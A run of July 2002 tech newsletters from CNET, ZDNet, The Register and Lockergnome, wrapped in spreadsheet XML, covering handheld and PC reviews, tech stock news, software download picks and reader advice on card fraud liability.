Toshiba Pocket PC e740Find the latest prices for these and other handhelds on
				CNET Shopper.com.
			Handspring Eyemodule2
Though it's a little expensive, the Eyemodule2 is a well-designed camera attachment that offers acceptable image quality
Check latest pricesStart-up nears launch for Hiptop handheldStart-up shrinks PC to palm size
Most popular Palm downloadsMost popular Pocket PC downloads
Top 5 handheldsEditors' Choice handheldsNewsProduct reviewsWireless handheldsSoftwareDownloadsJuly 9, 2002
When reviewing the Toshiba Pocket PC e740, I spent a lot of time trying to understand its XScale processor. A benchmark provided by Intel seems to indicate that it performs certain operations faster than previous Pocket PCs, but in hands-on use we didn't find any significant difference in performance. I'm still not certain whether I should attribute performance limitation to the operating system (which hasn't been optimized for the new chips), applications (which likewise haven't be optimized), or simply that the new chip isn't that much better than the old StrongARM. But regardless, the e740 is an exceptional Pocket PC and one I don't hesitate to recommend to those looking for a high-powered PDA. 
					Colin Duwe
					Associate Editor
					CNET Electronics
              		In Palm OS:Â Most	Popular Titles
Week ending June 111Noah Lite English dictionary2DopeWars (Palm)
3Blocks
4Palm Desktop5SketcherAll popular Palm OS downloads
In Pocket PC:Â Most Popular TitlesWeek ending June 111SimCity20002TV Remote Controller3GigaBar4ActiveSync
5Syntact Gamebox (Pocket PC)
All popular PocketPC downloads
Must-have Palm OS games: Newly updated
We've listened to reader suggestions, tested the latest games to be released, and now we're ready to present our current list of favorite games for your Palm.
							Read the full story
Toshiba Pocket PC e740
Powered by Intel's new 400MHz XScale processor and boasting integrated Wi-Fi connectivity, Toshiba's new PDA is an impressive mobile machine. We got hands on with it to test the new chips and its myriad features. See how it did.
							Read the review Â |Â 
							Check latest price
More handhelds reviews &amp; features 
Uninstall Hack 1.59
File size: 36.6K
									License: Free to try; $7.00 to buy
									Uninstall Hack is designed to help keep your Palm device running smoothly by monitoring application installations and removing all traces of an
application during the uninstall process. Uninstall Hack also removes
leftover files from applications removed using the standard Palm OS delete
tool, leaving your Palm device clean and trouble-free.
Quik Budget 3.2
All Palm OS editors' picksPictPocket 2.0
File size: 1.09MB 
									License: Free to try; $16.95 to buy
									Take your pictures with you on your Pocket PC. PictPocket allows you to
view and edit several types of digital image files including MPEG-1 and MPEG-2 video, BMP, 2BP, JPG, JPE, JPEG, GIF, and many more, making this a truly mobile multimedia solution.
		All Windows CE/PocketPC editors' picks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</si>
  <si>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CNET Shopper Newsletter: Electronics Edition
Shopper
											All CNET
											The Web
										Â 
									1
Sony Cyber Shot DSC-F707
2
Canon PowerShot S40
3
Palm m515
4
Palm i705
5
Nikon Coolpix 995
Â 
		All most popular
Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoft 
 Canon PowerShot S330 Elph
											â€¢ 2,000,000 pixels
											â€¢ 2.5 x digital zoom
											â€¢ 3 x optical zoom
											â€¢ Built-in flash
											â€¢ Just $338Accessorize your camera:
Canon CB-2LS Battery Charger
Canon ACK-500 Power Adapter KitCanon 48 MB CompactFlash Card
Canon 64 MB CompactFlash CardFujifilm FinePix 30i
								â€¢ 1,920,000 pixels
								â€¢ 5.3 oz
								â€¢ Built-in flash
								Â Â Lowest Price: $245Minolta Dimage X
								â€¢ Free shipping available
								â€¢ 2.1-megapixels, 1.5-in LCD
								â€¢ 3 x optical zoom, 2 x digital
								Â Â Starting at: $282Olympus Camedia D-40 Zoom
								â€¢ 4.0-megapixel, 1.8-in LCD monitor
								â€¢ 2.8x optical/2.5x digital zoom
								â€¢ Incl. 16MB SmartMedia card
								Â Â Lowest Price: $447Canon PowerShot A40
								â€¢ 2-megapixels, new shooting modes 
								â€¢ 2.5x optical/3x digital zoom
								â€¢ Professional-level features
								Â Â Lowest Price: $268Casio GV-10
								â€¢ 1,200,000 pixels
								â€¢ Built-in flash
								â€¢ 1.6 in LCD display
								Â Â Lowest Price: $310Kyocera Finecam S4
								â€¢ 3,870,000 pixels
								â€¢ 2.5 x digital zoom
								â€¢ 3 x optical zoom
								Â Â Lowest Price: $524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</si>
  <si>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The tech side of homeland defenseÂ Search
	                Â 
	                Â 
News.com
	                All CNETÂ Â Â Â 
	                The Web
                Â Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoftJuly 10, 2002The tech side of homeland defenseStudios sue defunct $1 movie site$215 million later, start-up Pluris shuts downApple to expand iMac LCD displayNextCard cuts off credit card customersTapping China's brainpowerÂ Vision Series			Read News.com's exclusive interviews of 10 top CIOs.
Vision Series home
The tech side of homeland defenseComputer security is becoming an increasingly critical part of President Bush's proposal for a Department of Homeland Security, as politicians fret about tech-savvy terrorists--and insist that any new agency must shield the United States from electronic attacks. Meanwhile, the administration says that it's open to the idea of a chief privacy officer for the agency.
July 10, 2002, 9:45 AM PT
 | Read Full Story Studios sue defunct $1 movie siteThe movie studio's trade association filed suit Tuesday against Film88.com, a would-be Internet video Web site that has allegedly popped up in several incarnations around the world.
Calling the site a "piratical, virtual 'video-on-demand' business," the Motion Picture Association of America (MPAA) and its member studios sued the company and an individual allegedly associated with it in a California federal court.
July 10, 2002, 12:00 PM PT
 | Read Full Story $215 million later, start-up Pluris shuts downNetworking start-up Pluris will release a statement Wednesday announcing it has closed its doors due to a lack of funding and ongoing woes in the market it serves, according to a spokeswoman familiar with the company's plans.
Pluris, a once promising company, burned through $215 million over the past few years as it attempted to build a high-end router that was intended to outclass similar products from competitors such as Juniper Networks and Cisco Systems.
July 10, 2002, 12:30 PM PT | Read Full Story 
Apple to expand iMac LCD displayApple Computer plans to serve up a new iMac model with a larger flat-panel display during next week's Macworld Expo trade show, according to sources.
The upgrade to a 17-inch liquid crystal display (LCD) comes as sales have all but stalled on existing 15-inch flat-panel iMacs. Apple unveiled the original flat-panel iMac, which suspends the monitor from a pivoting arm attached to a hemispherical base, during January's Macworld Expo in San Francisco.
July 9, 2002, 3:50 PM PT
 | Read Full Story NextCard cuts off credit card customersFederal regulators on Wednesday deactivated hundreds of thousands of credit cards belonging to former customers of NextCard.
The Federal Deposit Insurance Corporation (FDIC), which had been trying unsuccessfully to sell the 800,000 accounts since taking them over in February, shut them down after they failed certain performance measures over the past three months, said David Barr, an FDIC spokesman. Although NextCard customers will no longer be able to use their cards to make purchase or cash withdrawals, they will continue to be responsible for their outstanding balances.
July 10, 2002, 12:25 PM PT
 | Read Full Story Tapping China's brainpowerThe country's engineers are ambitious--and finding open arms at U.S. companies.
July 10, 2002, 4:00 AM PT
 | Read Full Story 
From our partners:The WorldCom hearing's target: votersBusiness Week
November-nervous lawmakers hogged the stage in a show of outrage and concern, while fact-finding barely made a cameo.
July 10, 2002
 | Read Full Story Can Bush walk his talk?Business Week
He said much that was right in his Wall Street speech. But doubts swirl about his follow-through--and his own business dealings.July 10,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Tech hurdles ahead for e911
Correspondent Melissa Francis looks at the technology hurdles facing wireless carriers in launching the second phase of the e911 initiative by October.
 Watch Video
Â Â EnterpriseIndia's Infosys tops forecast but is waryLiberty Alliance to unveil software specFBI picks new CIOE-BusinessStocks slump on accounting jitterseBay glitch charges sellers doubleBush speech leaves Wall Street doubtingCommunicationsWorldCom scrutiny goes federalComcast shareholders bless AT&amp;T dealU.S. Attorney investigates QwestMediaBanks bail out Vivendi with loansBush security plan may get privacy nodGnutella pioneer Gene Kan diesPersonal TechnologyVerizon dials in for downtown detailsTaiwan's Acer sees lax tech reboundChipmaker packs Wi-Fi into handhelds        Â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</si>
  <si>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CNET Investor Dispatch
Quote LookupEnter symbol:Â· Symbol Lookup
Quotes delayed 20+ minutes
â€¢ My Portfolio
â€¢ Broker Reports
â€¢ IPOs
â€¢ Splits
â€¢ Messages
Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoftJuly 10, 2002 DJIA8813.50 Â -282.59
 NASDAQ1346.01 Â -35.11
 S&amp;P 500920.47 Â -32.36
 CNETÂ TECH965.29 Â -26.23CNET News.com Vision SeriesRead News.com's exclusive interviews of 10 top CIOs.Vision Series home
Tech stocks drop again on Qwest criminal probe news
Word telecom Qwest Communications International is being investigated by the U.S. Attorney's office in Denver helped send technology shares lower Wednesday.Despite a Merrill Lynch upgrade of Cisco Systems and the fact that J.P. Morgan began coverage on AOL Time Warner with a "buy" rating, CNET's Tech index fell 26.23 points, or 2.66 percent, to 965.29. The tech-heavy Nasdaq composite index lost 35.11 points, or 2.54 percent, to 1,346.01--a multi-year low.Broader markets also shed value, dragged down in part by a troubled pharmaceutical sector. The Dow Jones industrial average dropped 282.5 points, or 3.11 percent, to 8,813.5, and the S&amp;P 500 slid 32.36 points, or 3.52 percent, to 920.47--also a multi-year low.
AT&amp;T, Comcast Shareholders OK Broadband Deal 
Shareholders of AT&amp;T Corp. and Comcast Corp. on Wednesday approved the planned $27 billion merger of AT&amp;T Broadband with Comcast, which will create the nation's largest cable TV operator with more than 22 million customers.
Telephone giant AT&amp;T in December agreed to sell its cable television unit to Comcast as part of a restructuring that dismantled its vision of becoming a one-stop shop for telephone, data and video services.AT&amp;T CORP 9.78 -2.30% $215 million later, start-up Pluris shuts down 
Networking start-up Pluris will release a statement Wednesday announcing it has closed its doors because of a lack of funding and ongoing woes in the market it serves, according to a spokeswoman familiar with the company's plans.
Pluris, a once promising company, burned through $215 million over the past few years as it attempted to build a high-end router that was intended to outclass similar products from competitors such as Juniper Networks and Cisco Systems.CISCO SYSTEMS 13.51 2.82% WorldCom contracts under U.S. scrutiny 
The accounting scandal at WorldCom has prompted U.S. government agencies to scrutinize the telecommunications company's billions of dollars in federal contracts.
The Federal Aviation Administration, for one, has been forced to take stock of the situation quickly. WorldCom is a finalist for a 20-year, $3.5 billion contract with the FAA. The contract is expected to be awarded as soon as this week. The company is the incumbent on the contract, which supplies phone and data infrastructure to the nation's air traffic control systems.WORLDCOM INC-WORLDCOM TRCK STK 0.20 -3.81% 
Also from CNET
Real-time stock quotes from CNET News.com Investor.30-day free trial!
Banc of America Securities lowers estimates and price target on IBM in notes 7/10/02 
Analyst Joel Wagonfeld argues the computer giant is not immune to the persistent, widespread weakness in IT spending. But a roughly 6 percent dip in revenues during the second quarter will be offset by the elimination of losses from the discontinued hard disk drive business, Wagonfeld predicts. In IBM's second-quarter results, he expects continued weakness in hardware but relative strength in software and outsourcing. The company's decision to exit or restructure unprofitable, commodity businesses is sound, Wagonfeld says. He reiterates a "buy" rating on IBM.INTL BUSINESS MACHINES 68.76 -1.31% 
Visit the Brokerage Center
Pressplay CEO Schuon to leave company
Andy Schuon is leaving as president and chief executive officer of Pressplay, a joint online venture between Sony Music and Universal Music, sources close to the matter said on Wednesday.Sony Music is a unit of Sony Corp, and Universal Music is a unit of Vivendi Universal.SONY CORP ADR 50.47 -4.32% 
Visit the CEO Wealth MeterDigicams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</si>
  <si>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
CNET Hardware NewsletterSamsung ML-1430Â 
In HardwareUnitech 2U4U DMR-300 
In ElectronicsVideo Explosion Deluxe 
In SoftwareSony Ericsson T68 
In Wireless
Computers
 				All CNET
 				The Web
July 10, 2002							--Tom Dunlap
							Senior editor
							CNET Hardware
Dear Readers,Hey, it's not all bad news in the corporate world. One definite
business success story is Big Blue's ThinkPad T series. These
versatile and speedy thin-and-light notebooks share a sturdy,
well-designed black case and come in so many configurations that
you can find one that's right for just about any use. They also
range in price from $2,199 to a hefty $3,499.  For a comprehensive
look at this line of notebooks, check out our verdict.Read the review
Â |Â 
Check latest pricesclick  here for details 
Intel's new insidesThe i845 chipset's many flavors are faster, better, and a lot more confusing. Read before you shop.
	â€¢ Gateway 300 series keeps PCs simple	â€¢ Modernize your motherboardMost popular
Desktops
	1. Gateway 700XL
	2. Dell Dimension 4000 series
	3. HP Pavilion 950
	4. Alienware Aurora DDR
	5. Falcon Northwest Mach V
 See all most popular desktops
IBM's thin ThinkPads fit to a TThe ThinkPad T-series notebooks are fast, and they offer a great
design, innovative features, and good support. For a comprehensive
look at this line of notebooks, check out our verdict.Read the review
Â |Â 
Check latest prices
Inside the Labs: The PC of the future, part twoMira, a flat-panel display that wirelessly connects to a PC, will
let you take your system anywhere in your house--or so Microsoft
promises. This is just one of the coming-soon-to-a-living room-near
-you technologies that Microsoft promoted at its annual hardware
summit. Labs Manager Daniel A. Begun has the scoop on the next
batch of Microsoft-promoted technologies that could change the way
consumers use their PCs.Gateway 300 series keeps PCs simpleGateway's most basic desktop line offers some good values for
students and families buying second computers for their children--
if you configure carefully. But if you're eyeing the fancy LCD and
DVD-ROM drive options, get a fancier PC to go with them. Find out
why in our review.
Read the reviewÂ |Â Configure &amp; priceMidrange iBuyPower PC suffers from low-end bluesThe generic iBuyPower Argous has some nice features, but it lacks
the performance, the support, and the finishing touches delivered
by similarly priced competitors. Read our review to find out where
it falls short--and which systems in this price range present
better alternatives.
Read the reviewÂ |Â Check latest pricesAdd wireless networking for $200 or lessWi-Fi (802.11b) access points provide the cheapest, easiest way to
extend your wired or wireless network to the far-flung reaches of
your home or office. Check our reviews of access points from Agere
Systems, Belkin, and D-Link to see which is the cheapest, which has
the best security, and more.
Read the review
the hottest products this weekCendyne 48X/12X/48X EIDEÂ |Â 
Check latest prices
95ms access time; 2MB cacheIBM ThinkPad R32Â |Â 
Check latest prices
Pentium 4-M-1.8GHz; 256MB RAM; 30GB hard driveToshiba Satellite 5105-S502Â |Â 
Check latest prices
P4-1.7GHz; 512MB RAM; 40GB hard driveSony GDM FW900Â |Â 
Check latest prices
24 inches of new viewing bliss; built-in USB hubOverheard on Computers.com
"Simply wow!"
"Now this is an awesome machine"
"Slick, spartan design--raw power"
"Powerful, solid, and durable"
"Love it--oh, what a programmer's keyboard!"
"Best of the best"
"Reliably fast with beautiful screen"Click here to find out what this mystery product is.Read the reviewÂ |Â Check latest prices
Click here to see more of CNET's User Opinions.CNET Message Boards: Computer Help is here
Stumped by computer hardware and software problems? Never fear;
check out the CNET Message Boards, where quick help is just a post
away. Join us in the Computer Help forums.Live tech help: submit your questions now
CNET News.com: Top CIOs on the future of IT
Find a job you love, with more than 1 million postings
ZDNet: This IT director has had enough of Microsoft
May Editors' Choice award: Pioneer's HTS-910DV
The e-mail address for your subscription isÂ qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org
UnsubscribeÂ |
Â Change e-mail formatÂ |
Â Change e-mail address|
Â FAQÂ |
Â AdvertisePrice comparisons |
Product reviews |
Tech news |
Downloads |
All CNET services        Copyright 2002 CNET Networks, Inc. All rights reserved.          
.</t>
  </si>
  <si>
    <t xml:space="preserve">
ZDNet AnnouncementsÂ Â Â         July 10, 2002 
Exclusive 
                Offer for ZDNet  
                Members... Now 
                40% off! 
Dear 
                ZDNet Member: 
Just a quick 
                note to let you know that your ZDNet membership now qualifies 
                you for a special 40% discount on ZDNet 
                Rewards, our advanced tech service! Join ZDNet 
                Rewards and you get all 
                these great benefits:
Interactive 
                    Web design classes: learn online, at your own pace
Subscription 
                    to Computer Shopper magazine
Access 
                    to ZDNet's private tech research center
Members-only 
                    online forum for expert PC guidance and supportWebFerretPRO: 
                   a FULL copy of the ultimate Web search utilityAnd 
                    more... try 
                    it now! 
Try ZDNet 
                Rewards for a full month for just $1 -- and if you 
                love using these advanced features, you can become a full member 
                for 40% off the regular cost! Go here for all the details:
Join 
                        today and get your first month for just $1!
Thanks for 
                being a part of ZDNet, the premier technology community. 
-- The ZDNet 
                team
Sign up for more free newsletters from ZDNetThe e-mail address for your subscription isÂ qqqqqqqqqq-zdnet@spamassassin.taint.orgUnsubscribeÂ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</si>
  <si>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Download Dispatch: Tools for Software DevelopersÂ ActiveX controls
We've selected our top programs that handle transparent GIF
   files, offer prebuilt ActiveX controls, and edit hex code
   to get you up and running.Anfy Java 2.0
Apply magical effects to your Web-bound images.ActiveFile 2.3Add file-handling capabilities to your Active Server Pages.
UltraEdit-32 9.1
Edit text, HTML, or hex code, with a comprehensive support for a programmer's needs.
SQL*Lite 2.6
Run up to five simultaneous SQL queries with this tool for Oracle and MySQL.
Software Upgrades:Â 1.
				 ZoneAlarm Pro 3.0Â 2.
				 Norton AntiVirus 2002Â 3.
				 AdSubtract Pro 2.5Â 4.
				 Microsoft Windows XP - ProfessionalÂ 5.
				 Nero Burning ROM 5.5Â 6.
				 Reason 2.0Â 7.
				 Microsoft Windows XP - Home EditionÂ 8.
				 QuickBooks Pro 2002 Â 9.
				 Adobe Photoshop 7.010.
WinZip 8.1Find a complete
list of the 50 most popular software products at CNET
Shopper.com.
July 10, 2002 Greetings from Download.com!
If you're developing Windows applications in an
ActiveX-compatible environment (which includes most major ones
such as Visual Basic and C++), it's time you started taking
advantage of prefab programming components. An amazing array of
controls are out there, with more arriving at Download.com
every day. This week, we've collected the top programs that
handle transparent GIF files, offer prebuilt ActiveX controls,
and edit hex code to get you up and running.Also this week, we've got two really useful ActiveX entries:
FileSystem 1.2 and AppSecureX 2.9. FileSystem gives you access
to drives, folders, and I/O operations; and AppSecureX adds
serial number and shareware-type functionality to your
applications.Becky Waring
Contributing Editor, CNET Download.com
From Builder.comSix
MySQL/PHP functions to streamline development
Code reuse is one of the keys to increasing developer
     productivity. This article looks at several handy functions
     you can use to save time when building applications using
     PHP and MySQL.Faking
SOAP principles with familiar techniques
SOAP is everywhere you turn. But what exactly is it? Take
     this guided tour to gain working knowledge of this emerging
     standard.in ActiveX
FileSystem 1.2
Having problems wrangling the Windows File System? The
   FileSystem ActiveX control offers complete access to common
   file information under Windows through three independent
   interfaces. Everything from drive and folder access to file
   I/O operations is available with only a few lines of code.
   Use this control's interfaces to detect media types and
   media insertion, get complete lists of folders and files at
   unlimited folder depth, find out what attributes are set on
   files, and even load logbook files into collections
   automatically. Rope in your files.
ApSecureX 2.9
Prevent pirates from copying your software with AppSecureX.
   This control provides a registration system that produces a
   valid serial number customized to the user's machine. When
   the user installs your software, a unique ID number is
   generated for that system. To get the serial number, the
   user must provide you with his installation number. The
   data file created by the application is encrypted
   differently for each system, so even if someone were to
   crack the file, they couldn't use the information on
   another machine. AppSecure can also give your software
   shareware functionality such as number of days left, checking
   to see if the system clock is set back, and so on. AppSecureX
   works with any ActiveX-enabled programming language such as
   Microsoft Visual Basic or Microsoft Visual C++. A demo
   application is included. Lock up your software.
in Java
AppletFile 2.5
AppletFile is a set of Java applets that will enhance your
   Web site's file upload and download capabilities. In
   addition to support for SSL, proxy, and authenticated
   uploading, users can upload and download multiple files
   using predefined paths to automate the process as much as
   possible. A scripting language provides for sophisticated
   customization, and the user interface includes support for
   12 different languages. Transfers are faster because the
   applet uses its own compression (AutoZIP). The AutoSYNC
   feature downloads only updated files, and verification of
   file transfer integrity is made possible with built-in
   support for MD5 message digests. AppletFile is based on
   HTTP protocols and is firewall-friendly. This update adds
   Sun's Java Plug-in support for Netscape 6+ browsers and
   shows removable media drives in the browse dialog. Beam up
   your files.
in Tools &amp; Editors
PHP Master Editor 2.0
Write, edit, and debug PHP scripts and HTML pages with this
   tool. PHP Master Editor includes an internal browser for
   viewing, as well as a debugger for local testing. Basic FTP
   capability is also included. Specifically designed for PHP
   programmers, the program recognizes and formats functions,
   variables, and classes within the code, and features
   customizable code templates. Get code-happy.Â 
Most
Popular TitlesWeek ending July 7Â Â LastÂ Â WeekÂ 
Â Â WeeksÂ Â onÂ ChartÂ 
Â Â DownloadsÂ Â This
WeekÂ 
1Microsoft
Java Virtual Machine48312,047
2Microsoft
Windows Installer (95/98/Me)
1
83
10,817
3Microsoft
Data Access Components RTM3839,911
4Java 2
Runtime Environment, SE
2839,685
5Visual Basic
6.0 Runtime Module SP55728,243
6ActiveX Control Pad
863,740
7Mozilla (32-bit)
7
4
3,071
8Microsoft Windows Installer (Windows NT/2000)9362,4119Borland C++ Compiler10592,35610Java 2 Development Kit14832,144The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</si>
  <si>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Nokia claims Matsushita scalp for Series 60
    We don't know the Finnish for Bill, but it's probably got more vowels than are useful in it...
        http://www.theregister.co.uk/content/4/26126.html    Microsoft stakes IP claims on OpenGL
    From the We Told You So dept.
        http://www.theregister.co.uk/content/4/26125.html    Microsoft 'hoovers millions' from UK schools - MP 
    Blizzard descends on per seat licensing
        http://www.theregister.co.uk/content/4/26124.html    Last minute glitch knocks Win2k SP3 back to summer
    Which in WA can mean many things...
        http://www.theregister.co.uk/content/4/26118.html    MS to ship 64-bit .NET preview this month
    Here's one we'll prepare later...
        http://www.theregister.co.uk/content/4/26117.html    Congressman vows Pigopolist legislation
    Cleanup starts here
        http://www.theregister.co.uk/content/4/26112.htmlPersonal Hardware    Dan Technology -  two concerned customers!
    Bulging postbag. Kinda
        http://www.theregister.co.uk/content/54/26130.htmlInternet    al-Qaeda poised to strike hard via the Internet
    Red Alert Finger on the button        http://www.theregister.co.uk/content/6/26134.html    Dutch ban virtual kinderporno
    Fake images, real depravity
        http://www.theregister.co.uk/content/6/26132.html    Tiscali to shut second UK office. Or not
    Shurely shome mishtake?
        http://www.theregister.co.uk/content/6/26131.html    Liverpool Council bans email on Wednesdays
    But only internal, and no sanctions
        http://www.theregister.co.uk/content/6/26128.html    IC24 launches daytime Net service
    Remember them?
        http://www.theregister.co.uk/content/6/26127.html    Future for online content is bright 
    Screen Digest's screen dump
        http://www.theregister.co.uk/content/6/26122.htmlNet Security    al-Qaeda poised to strike hard via the Internet
    Red Alert Finger on the button        http://www.theregister.co.uk/content/55/26134.html    Internet attacks on the rise
    Surprise, surprise
        http://www.theregister.co.uk/content/55/26119.htmlBusiness    Dell rules out Lexmark purchase
    Interested in ink, not inking
        http://www.theregister.co.uk/content/7/26115.htmlNetworks    Networking vendors eat their babies
    Hey, it's a tough world out there
        http://www.theregister.co.uk/content/5/26133.html    Cisco to roll out airport WLAN hotspots in Europe
    Claims 19 signed so far
        http://www.theregister.co.uk/content/5/26114.htmlBroadband    Blueyonder and One.Tel in broadband promos
    But not together
        http://www.theregister.co.uk/content/22/26120.htmlAbout The Register    Hacker t-shirt launched in medium
    Good news for any reader under 16 stone
        http://www.theregister.co.uk/content/31/26123.html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</si>
  <si>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20020711 Lockergnome Windows Daily
Â  07.11.2002 GnomeREPORT GET HIGH-SPEED ACCESS: Verizon Online DSL is an affordable, high-speed Internet connection. Click here to see if Verizon Online DSL is available in your area. 
I'm not a banker, and I'm not a credit expert - but these people
speak from personal and professional experience. Draw your own
conclusions. Lockergnomie Sang Vo writes: "Though you may have
zero liability for a fraudulent transaction, the paperwork and red
tape to work through if someone empties out all your funds can
leave you hurting for a while. There are many credit cards that
now offer zero liability for fraudulent transactions. So, contact
your credit card provider / bank to see if you can have such a
plan added to your card or if you can apply for one that does."
And Russ Coover continues: "If you purchase something with a
credit card, and you later decide to dispute the purchase (for a
reason such as the product was faulty and the merchant refuses to
replace it or, perhaps the product was never delivered), you can
legally dispute the charge with your credit card company. However,
if you use a debit card to make that purchase, you have no right
to dispute the charge."Jeff Morgan has a different interpretation of the regulation in
question (E): "In 12 CFR II, Section 205.6, it's saying that if
you give your financial institution timely notice of the theft of
your card or PIN code (two business days), you are liable for no
more than $50, otherwise you may be liable for up to $500." And
Tim Miller extends the translation: "If someone puts a false
charge on a credit card, the worse that will happen is your
liability for $50, with the possibility that your next charge
might not go through because the thief used all of your available
balance.  If a false charge goes against your debit card and wipes
out your bank balance, however, outstanding checks can bounce.
 Your bank may be able to get you all of your money back, but the
payees of those bounced checks might sock you with $20-25
insufficient fund fees - and they are under no obligation to waive
those fees.  If you have  5 checks outstanding, you could be out
over $100."Frank Reyes was apparently lucky: "Someone recently obtained my
debit card number through a local grocery store. I was told by the
checker at the grocery store that the card readers would only
accept Visa cards not ATM cards. I was very suspicious, and used
my debit card instead. Apparently, the store's computer had been
hacked, and my debit card number and name (among several
others)were forwarded to an unscrupulous individual. I was
reviewing my checking account online two days later, and noticed
an unauthorized charge against my account ($60.00). I contacted
the vendor that had charged my account and informed them of the
fraudulent charge. The vendor stopped the shipment, provided the
shipping address to my bank, and credited my account within 5 days
after I informed them (The delay in the fund reversal was due to
the 4th of July weekend). The only negative aspect is the fact
that I had to request a new debit card, which has yet to arrive."Further thoughts from Lockergnomie James Simbro: "I'm not totally
sure on this, but I've been warned against using a debit card for
online purchases.  Yes, you may not be liable for any of the
false charges on a debit card (in the end), but in the meantime
(during your dispute) the money will be withheld from your account
and you will not have access to it. However with a credit card,
you are not responsible for funds that are in dispute. The
scenario I was given, was imagine if somebody falsely used your
debit card and cleaned out your checking account?  The money is
gone! False charges on a credit card are not "real money" until
somebody has to pay them.  I would guess that each bank has
different policies for debit card fraud. I might just have to call
mine and see what I'd face." In short, be careful - no matter what
you use or where you choose to use your plastic.
See You in August,Â Â Â Â Â Â Â Â Â Â Â Â Â Â Chris PirilloÂ Â Â Â Â Â Â 
Â GnomeDOWNLOADS
CYG v20020115 [3.2M] W9x/2k/XP FREEhttp://www.geocities.com/HoloGuides/CyG/{Manage your collections} It seems like everyone collects
something. In fact, just the other day I decided to start
collecting dust. It's much easier than collecting stamps. If you
do collect stamps, though, this organizer will help you keep track
of them all. Or you can use it to keep track of your Star Wars
trading card collection, or your coin collection, or your [insert
collection here] collection. It works for everything, get it? It's
also great for managing your MP3 lists, including ID3 tag editing.
"CYG is founded on an object-oriented database approach, and
carefully programmed with one goal in mind: universal usage."
DriverManager v1.0 [557k] 2k/XP FREEhttp://www.l5sg.com/DriverManager.html{Drive your drivers} Everyone else step outside while I have a
talk with the power geeks. If you're running on NT, 2000, or XP
and need to know what drivers you have running on your system,
this program can show you. That's not too shabby, but of course,
you can also change or even get rid of certain drivers if you
desire. And that's, um, even more not too shabby. And that Refresh
button is there to make sure you're seeing everything exactly how
you want it. "DriverManager is a tool designed to allow System
Administrators, Power Users and Driver Developers an easy means to
view, modify or remove drivers and their information."Recommend It!
Â GnomeCLICKS
Â GnomeSYSTEM
Transloaderhttp://www.transloader.com/"This site makes it easy to transfer files to your Web server.
Mostly it is useful for sites like FlamingText.com and
ImageBot.com to send generated images to another server (such as
your Web or FTP server). This is particularly useful for WebTV
users who can't save images on their own machine. Although we have
no pre-set limits (okay, it's 2.4 GB), the transfers that you do
through Transloader.com must be completed in five minutes. This
server is capable of transferring over 1 Gig per minute; if you
are talking to a slow server, your job may not complete in time.
Other transloaders sometimes suffer from overloading (too many
people using them), which is why I wrote this one. Hopefully, this
will never happen to us, but in any case, check these others out,
they have some nice services..."Recommend It!
Â GnomeWILDCARDFull PDF Books
Poor Richard's Web
Internet Promotions
E-Mail Publishing
Web Site Makeover
Websites Made Easy
Online Communities
Home Networking
Internet Recruiting
Online BrandingTo Share or Not to Share
Scribbled by Lee SmithI think that online file sharing is dependent on the file that is
being shared. If the song is a current release or recent, then I
do not believe in it. I can't consider it stealing because you
can't steal from someone who willingly puts the file up for
downloading. Those who did put the file online most likely feel
that it is also not stealing, since they purchased the CD.
However, I do not agree with RIAA or recording companies who are
attempting to make their CDs "rip proof" either. I do not feel
they have the right to dictate what songs I can listen to or when
or in what order. I like to rip specific songs from CDs then make
my own CD, which either goes down to my entertainment system or to
my truck. The master CD is saved and rarely played ("why" is
explained later in this message). I prefer making my own CDs for
my truck because if my truck were to be broken into and my CDs
stolen, it would be much easier to replace a self-burned CD than a
master. Sometimes, masters cannot be replaced without a large
expense, if at all.If the song is outdated, an oldie (so to speak), and is not
available anywhere, then yes, I do believe in it. Or, if the song
being sought is wanted to rejuvenate one's collection, then yes, I
do believe in that, too. Case in point: as a kid, I collected a
lot of 45s and record albums. I have more than 4,000 records in my
collection. Many were played so much that they are not playable
anymore and, even though I did take care of them, due to the cheap
stereos and record players in the 60s, they are 'shot.' I want to
relive some of my younger days through music, but attempting to
convert those records (to digital) is next to impossible for me.
So, in this instance, no, I do not think it is illegal to seek out
digitalized copies of the old songs that I already have records of
(albums and/or 45s). If, however, the song(s) that I am seeking
are available on CD, then I will be very quick to purchase that CD
from Tower Records, The Warehouse, or any other reputable dealer.For those that are impossible to find "digitals" for, then, one
day, perhaps I will reach a point with technology (and money)
where I can transfer those platters to WAV and they will sound as
good as when they were originally recorded. I have been lucky
enough to find some on CD thanks to the Internet; I was quick to
purchase the disc, usually from the original artists themselves.
Some of the music that I have, sadly, will never be heard again. I
blame RIAA and the recording industry for that, too. Neither seem
to care about the "lost" songs when digitally remastered CDs are
released.Submit Your Thoughts | Recommend It!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Â GnomeFAVORITE
Pixel Decorhttp://www.pixeldecor.com/{Patterns for your screen} *yawn* Your desktop is more boring than
I don't know what. Unfortunately, I, personally, can't help you
out. Don't fret, though, cause Jen is here to provide you with
some truly amazing desktop images, icons, and even calendars.
She's got a very unique and creative style that you may enjoy. Oh,
and did I mention she was a professional designer? That's right;
now you know it's all good. The best part? All these images are
FREE. The "Buzzz" tile is especially awesome (and this endorsement
is even coming from the guy who hates creepy-crawlies of all
kinds).
Recommend It!
Â GnomeTIPHelp Yourself
Microsoft Office Tips
PC Productivity Tips
Cool Internet Tips
Windows 2000 Tips
Windows XP Tips
Top 50 Fun Sites
Must-Know Terms
Top 50 Useful Sites
Top 75 Tech SitesWho can save you from making a small oversight with your digital
video camera purchase? Lockergnomie Frank Kenna: "I see that
you're thinking of getting a DV camera. I got one about a month
ago, and I made one mistake: I didn't get one with A/V INPUTS.
Mine has A/V outputs, which are great for getting your digital
stuff out onto VHS, etc. But without the inputs, there's no way to
get VHS or old 8mm footage into the camera. With inputs, not only
can you get your old 8mm &amp; VHS stuff onto DV tapes, but you can
use the camera as a pass-through device and get the old stuff
directly onto your computer for editing purposes. I wish someone
had made clear the advantages and importance of inputs when I
bought my DV camcorder. The reviews and magazines I read barely
mentioned this feature - and nobody stressed its importance. But
if you're going to be doing any editing, it is critical (if you
want to work on any of your old stuff). Don't make the same
mistake I did - make SURE you get this feature. It doesn't seem to
impact the price of the cameras; some offer it and some don't."
This advice came not a moment too soon for me. Thank you for
helping us, Frank!
Recommend It!http://www.lockergnome.com/issues/daily/20020711.html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
Â Latest Audio ShowÂ Low Price Search
